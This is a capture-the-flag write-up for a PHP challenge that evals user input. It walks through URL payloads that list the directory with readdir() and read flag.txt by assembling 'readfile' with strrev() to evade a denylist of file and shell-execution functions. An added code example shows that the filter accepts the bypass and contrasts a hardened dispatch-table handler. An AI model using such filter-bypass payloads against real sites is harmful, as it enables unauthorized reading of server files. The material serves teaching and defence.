http://challenges.ctfd.io:30068/index.php
Refer to the source file (index.php):
    $blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
    $special_block= "nc";
    $$special_block= "../flag.txt";
    foreach ($blocked as $value) {
        if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) {
            $printValue="";
            echo "<script>alert('Bad character/word ditected!');</script>";
            break;
        }
    }
These are the blocked words; we should somehow bypass this blacklist. As you can see, the getcwd() function is not blocked, so we can check the current directory path with it:
http://challenges.ctfd.io:30068/index.php?print=echo%20getcwd()
It says we're in /var/www/html. The blacklist contains ../flag.txt, so the flag might be in /var/www (?). We can get a list of files using readdir():
http://challenges.ctfd.io:30068/index.php?print=echo%20readdir(opendir(%27/var/www%27))
The above input will give us the first file/dir inside /var/www. Let's try it with more readdir()s:
http://challenges.ctfd.io:30068/index.php?print=echo%20readdir(opendir(%27/var/www%27));echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();
Wow! flag.txt is right there! How can we read it? All functions related to reading files are blocked (?)
A simple solution would be using strrev(). As we saw in the source file, it uses the eval() function, which just evaluates a string as PHP code, so we only need to generate a string that represents the code. I'm gonna combine readfile() and strrev() to bypass the blacklist:
http://challenges.ctfd.io:30068/index.php?print=chdir(%22/var/www/%22);echo%20getcwd();echo%20readdir(opendir(%22/var/www/%22));echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20readdir();echo%20strrev(%22elifdaer%22)(readdir());&debug=on
Cool! :D
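As an added example (not part of the original writeup, and not the challenge's own index.php), the following PHP puts the challenge's filter-then-eval pattern beside a handler that never passes client input to eval(). The denylist function is a strict model of the check in the excerpt: the word list and the regex are copied from it, while the function and constant names, the sample inputs and the hardened handler are my own.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's code. The word list and regex are the
// ones from the index.php excerpt; function and constant names are my own.
const BLOCKED_WORDS = ["cat", "more", "readfile", "fopen", "file_get_contents", "file", "SplFileObject"];
const BLOCKED_PATTERN = '/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i';

// A strict version of the challenge's denylist: true when the input contains
// none of the blocked words and does not match the blocked pattern.
function passes_denylist(string $input): bool
{
    foreach (BLOCKED_WORDS as $word) {
        if (str_contains($input, $word)) {
            return false;
        }
    }
    return preg_match(BLOCKED_PATTERN, $input) !== 1;
}

// The challenge's shape: whatever survives the filter is handed to eval().
// The filter inspects spelling, while eval() executes meaning, so an input
// that only builds the function name at run time (the writeup's strrev()
// trick) is never seen by the filter as the word it is looking for.
function vulnerable_print(string $printValue): void
{
    if (!passes_denylist($printValue)) {
        echo "Bad character/word detected!";
        return;
    }
    eval($printValue . ';');
}

// Hardened replacement: the request selects an operation by name from a fixed
// table, and nothing the client sends is ever treated as code. The directory
// is fixed server-side; the client cannot supply a path.
function safe_print(array $query, string $baseDir): string
{
    $ops = [
        'cwd'  => fn(): string => $baseDir,
        'list' => fn(): string => implode("\n", array_diff(scandir($baseDir), ['.', '..'])),
    ];
    $op = $query['print'] ?? '';
    if (!array_key_exists($op, $ops)) {
        return 'unknown operation';
    }
    return $ops[$op]();
}

// Constructed inputs: the writeup's first probe, a literal read, and the
// writeup's final payload. The filter accepts the final payload.
$samples = [
    'echo getcwd()'                 => true,   // first probe, passes
    'readfile("../flag.txt")'       => false,  // literal name and "." are both caught
    'strrev("elifdaer")(readdir())' => true,   // bypass: "readfile" never appears literally
];
foreach ($samples as $input => $expected) {
    $result  = passes_denylist($input);
    $verdict = $result ? 'passes' : 'blocked';
    printf("%-32s %s%s\n", $input, $verdict, $result === $expected ? '' : '  (unexpected)');
}

// The hardened handler only knows its two named operations.
echo safe_print(['print' => 'cwd'], __DIR__), "\n";
echo safe_print(['print' => 'strrev("elifdaer")(readdir())'], __DIR__), "\n";  // unknown operation
```

The point of the contrast is that a denylist can only reject the spellings its author thought of, while eval() runs whatever the surviving string means, so the filter and the interpreter disagree about what the input is. Replacing eval() with a dispatch table removes the disagreement: the client chooses among operations the server already defined, and there is no string left to filter.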